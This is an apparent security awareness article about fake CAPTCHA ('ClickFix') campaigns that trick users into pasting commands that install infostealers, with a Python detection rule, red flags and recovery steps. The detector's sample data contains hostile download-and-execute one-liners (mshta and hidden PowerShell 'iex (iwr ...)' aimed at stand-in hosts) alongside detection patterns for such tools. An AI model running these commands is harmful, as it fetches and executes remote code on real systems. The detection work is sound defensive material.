GOTCHA From CAPTCHA Causing More Havoc

A new breed of malware campaign is leveraging fake CAPTCHA verification screens to trick users into self-infecting their computers with password-stealing and cryptocurrency-draining malicious software. 

These campaigns often start with lures such as compromised websites or phishing emails that prompt users to solve what appears to be a legitimate CAPTCHA verification challenge. The CAPTCHA is a decoy that copies a malicious command to the system clipboard and instructs the victim to open the Windows Run dialog, paste the copied script, and execute it. 

This single action quietly downloads and installs malware - most commonly infostealers like Lumma Stealer or the Rust-based EDDIESTEALER - which then exfiltrate browser-stored passwords, cookies, and crypto wallet credentials, often targeting Chrome and other major browsers.
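The chain described above leaves a distinctive trace on the endpoint: whatever the victim pastes into the Run dialog is launched by explorer.exe, and the one-liners typically lean on built-in tools (mshta, PowerShell, cmd, curl) with a remote URL and flags that hide the window or bypass script policy. The following Python is an added illustration, not code from the article or any vendor named in it, of a scoring rule a SOC could run over process-creation telemetry (Sysmon Event ID 1 or Security 4688). The sample records, the tab-separated field layout, the threshold and the .invalid URLs are all constructed for this example.

```python
import re

# Constructed sample records shaped like ParentImage/Image/CommandLine fields from a
# process-creation event. Not real telemetry; hostnames use the reserved .invalid TLD.
# Fields are tab-separated so backslashes and quotes in command lines survive parsing.
SAMPLE_EVENTS = [
    # Run-dialog launch of mshta pointing at a remote "verification" script
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta http://captcha-check.invalid/verify.hta",
    # Run-dialog launch of a hidden PowerShell download-and-execute one-liner
    "ParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -w hidden -ep bypass -c \"iex (iwr http://example.invalid/a)\"",
    # Benign: user opened a text file from the Run dialog
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\notepad.exe"
    "\tCommandLine=notepad C:\\Users\\alice\\notes.txt",
    # Benign-looking developer activity: policy bypass, but no shell parent and no remote URL
    "ParentImage=C:\\Program Files\\Git\\git-bash.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -ep bypass -File build.ps1",
]

# Anything typed into the Win+R Run dialog is spawned by the shell, explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"

# Built-in tools that clipboard-paste one-liners commonly rely on.
LOLBIN_IMAGES = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
    "certutil.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe",
}

# Command-line traits; each match adds one point to the event's score.
CMDLINE_PATTERNS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(r"\biex\b|invoke-expression|\|\s*cmd\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}

# Shell parent (2) + living-off-the-land binary (1) + at least one suspicious flag (1),
# or a LOLBIN with three suspicious traits regardless of parent. Tune per environment.
FLAG_THRESHOLD = 4


def parse_event(line):
    """Split one constructed 'key=value<TAB>key=value' record into a dict."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(line):
    """Score one record and return (score, list of reasons) for analyst review."""
    ev = parse_event(line)
    score, reasons = 0, []
    if basename(ev.get("ParentImage", "")) == RUN_DIALOG_PARENT:
        score += 2
        reasons.append("parent is explorer.exe (Run dialog or shell launch)")
    image = basename(ev.get("Image", ""))
    if image in LOLBIN_IMAGES:
        score += 1
        reasons.append(f"living-off-the-land binary: {image}")
    cmdline = ev.get("CommandLine", "")
    for name, pattern in CMDLINE_PATTERNS.items():
        if pattern.search(cmdline):
            score += 1
            reasons.append(name)
    return score, reasons


def triage(lines):
    """Return the records whose score meets FLAG_THRESHOLD, with image, score and reasons."""
    hits = []
    for line in lines:
        score, reasons = score_event(line)
        if score >= FLAG_THRESHOLD:
            hits.append({
                "image": basename(parse_event(line).get("Image", "")),
                "score": score,
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['score']}] {hit['image']}: {', '.join(hit['reasons'])}")
```

On the constructed sample, the mshta and hidden-PowerShell launches are flagged while the notepad and build-script events are not. The explorer.exe parent is the key signal: the same PowerShell flags from a build tool score below the threshold, which is the caveat that keeps this rule from paging on every developer workstation.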

The infection routine is highly convincing because it mimics typical web security practices, using imagery and instructions identical to real human verification systems. 

Once the user falls for the ploy, the malware may further abuse built-in system tools, such as PowerShell, and JavaScript-based payloads to bypass traditional endpoint defenses and escalate access. 

Attackers typically harvest encrypted browser data, force the browser to load credentials into memory for extraction, and bypass authentication by stealing session cookies. Multi-stage payloads may also incorporate remote access tools, additional infostealers, or even persistent backdoors.

Delivery methods include phishing emails posing as security alerts for GitHub or gaming websites, malicious ads, and compromised legitimate domains. 

Source: https://icobench.com/news/new-malware-disguised-as-captcha-drains-passwords-and-crypto-funds/

Commentary

Like most malware campaigns, CAPTCHA malware has red flags.

It appears in odd places, such as on random content pages or after clicking an unrelated link or ad, rather than during a normal login, sign-up, or form submission. 
It asks you to do system-level actions, like pressing Windows + R, opening the Run box, copying and pasting a command, or running a script as part of "verification," which legitimate CAPTCHAs never require. 
It requests personal or sensitive data directly in the CAPTCHA flow, such as usernames, passwords, payment information, or crypto wallet details, which is not how genuine CAPTCHAs operate.
It triggers multiple redirects, intrusive pop-ups, or lands you on strange-looking or mismatched domains that do not align with the site you thought you were visiting.
It appears after following a link in a phishing email, a cracked-software download site, or suspicious social media/ad content, especially when coupled with pressure to "fix" a security issue or "verify now".
It uses poor grammar, awkward phrasing, inconsistent branding, or off-looking design elements that do not match known providers like reCAPTCHA or hCaptcha.


Steps to take if you believe your system is compromised:

Immediately disconnect from the internet (Wi-Fi and wired) to reduce further data exfiltration and remote-control potential from infostealers or remote access tools delivered through fake CAPTCHAs.
Report the incident to your organization's IT or security team.
Run a full scan, with IT's help or using reputable security software, and allow it to quarantine or remove any detected threats; then consider a second-opinion scan from another trusted tool to catch infostealers, RATs, or clipboard hijackers.
From a separate, clean device, change passwords for email, banking, crypto exchanges and wallets, and other critical accounts, and enable multi-factor authentication wherever possible to blunt the impact of stolen credentials or session cookies.
Review financial, email, and cloud service activity for unfamiliar logins, transfers, or configuration changes, and promptly notify your bank, credit card issuer, or crypto platform of any suspicious activity so they can lock or monitor accounts.
If you suspect deep compromise, such as repeated detections or signs of remote control, back up only essential data, wipe and reinstall the operating system, then restore from known-good backups and re-secure accounts from a freshly rebuilt environment.


Additional Sources: https://case.edu/news/beware-fake-captcha-pages-spreading-malware; https://www.usnh.edu/it/blog/2025/05/fake-captchas; https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf
